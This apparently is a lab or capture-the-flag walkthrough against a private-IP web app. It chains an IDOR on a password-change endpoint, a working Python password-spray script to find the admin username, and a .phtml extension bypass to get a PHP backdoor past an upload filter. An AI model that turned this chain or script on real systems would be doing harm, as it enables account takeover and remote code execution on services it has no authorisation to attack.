Registered as `cxnsxle`, there is an endpoint that changes our password and identifies the account by its numeric id.

We can actually change the password of any user simply by supplying a different id in that request, for example id=1: the endpoint does not check that the id belongs to the logged-in user (an IDOR / broken object-level authorization).

I wrote a Python script to brute-force the username of the account with id=1 (we already know its password, since we just set it ourselves, so this is really a password spray of one password over a username wordlist):
#!/usr/bin/python3
from requests import Session
from pprint import pprint
import sys
def print_sess(session):
    """Dump a session's cookies and headers to stdout (debug helper).

    Args:
        session: a ``requests.Session`` (or any object exposing ``cookies``
            and ``headers`` attributes). Useful for checking what the proxy
            and the target have set before the spray starts.
    """
    for label, value in (("COOKIES", session.cookies), ("HEADERS", session.headers)):
        print(label)
        pprint(value)
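def session_cleaned():
    """Build a ``requests.Session`` tuned for lab work through an intercepting proxy.

    Returns:
        A Session with TLS certificate verification disabled, a browser-like
        User-Agent, a form-encoded Content-Type, and plain-HTTP traffic routed
        through a local proxy on 127.0.0.1:8080 (Burp/ZAP). Only the ``http``
        scheme is proxied; HTTPS requests go direct.

    NOTE(security): ``verify=False`` disables certificate validation, so every
    HTTPS request made with this session is MITM-able. That is acceptable
    against a lab target that is being intercepted on purpose; never reuse
    this factory against a real service.
    """
    s = Session()
    # Honour HTTP_PROXY/HTTPS_PROXY/NO_PROXY from the environment for debugging.
    # This is already the requests default; kept explicit so it is not "fixed"
    # to False by a later refactor.
    s.trust_env = True
    s.verify = False  # equivalent of curl -k; see the NOTE in the docstring
    s.headers.update({
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0",
    })
    # The proxy URL must be a bare URL. The original listing had it wrapped in
    # markdown-style angle brackets ("<http://...>"), which requests cannot
    # parse as a proxy address.
    s.proxies.update({"http": "http://127.0.0.1:8080"})
    return s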
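def login(session, username, password, base_url=None):
    """POST one username/password pair to /login.php and return the raw response.

    Args:
        session: the ``requests.Session`` to send with.
        username: value for the ``username`` form field.
        password: value for the ``password`` form field.
        base_url: scheme+host of the target without a trailing slash. Defaults
            to the module-level ``main_url`` so existing callers are unaffected.

    Returns:
        The ``requests.Response``. Redirects are deliberately NOT followed: on
        this target a successful login answers with a 302, and following it
        would turn that signal into a 200 of the post-login page.
    """
    target = main_url if base_url is None else base_url
    form = {"username": username, "password": password}
    return session.post(
        url=f"{target}/login.php",
        data=form,
        allow_redirects=False,
    )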
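def brute_force(session, wl_path=None, password="cxnsxle123"):
    """Spray one known password across a wordlist of candidate usernames.

    This is a password spray rather than a brute force: the password is the
    one we set ourselves through the IDOR on the password-change endpoint, and
    only the username of the account with id=1 is unknown.

    Args:
        session: the ``requests.Session`` to use (see ``session_cleaned()``).
        wl_path: path to a newline-separated username wordlist. Defaults to
            ``sys.argv[1]`` to keep the original CLI usage working.
        password: the password to try with every username.

    Returns:
        The first username that logged in, or ``None`` if no candidate did.

    Raises:
        OSError: if the wordlist cannot be opened.
        IndexError: if ``wl_path`` is omitted and no argv[1] was given.

    NOTE(security): every candidate costs one real login request. Outside a
    lab expect account lockout, rate limiting and audit-log entries.
    """
    if wl_path is None:
        wl_path = sys.argv[1]
    with open(wl_path, encoding="utf-8") as f:
        # Strip the line ending properly. The original replaced the two
        # characters backslash-n, which leaves the real newline attached to
        # the username; blank lines are dropped so no request is wasted on "".
        candidates = [line.strip() for line in f if line.strip()]
    for username in candidates:
        response = login(session, username, password)
        # This target redirects (302) on success and re-renders the form on
        # failure. It is a heuristic tied to this application; a 302 to an
        # error page would be a false positive.
        if response.status_code == 302:
            print('PWNED ->', username, ":", password)
            return username
    return None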
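if __name__ == "__main__":
    # Target as bare scheme+host, no path and no trailing slash, because
    # login() appends "/login.php". The angle brackets around the URL in the
    # original listing are a markdown artefact and make the URL unparsable.
    main_url = "http://192.168.200.153"
    sess = session_cleaned()
    brute_force(sess)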
Run it with a wordlist of usernames:
python3 bf.py /usr/share/SecLists/Usernames/Names/names.txt

Now I can log in as `admin` (the user with id=1) with the password we set.

This user can upload files, which are stored under the web-accessible directory http://192.168.200.153/upload/
I uploaded a PHP backdoor, but it does not work: the upload is rejected.

The upload only accepts jpg, png and gif files, and the check is made on the file extension.
I bypassed this filter (an extension check, not a real WAF) by uploading the backdoor with the .phtml extension: the filter does not cover it, but on this target the web server still hands .phtml files to the PHP interpreter, so the backdoor executes.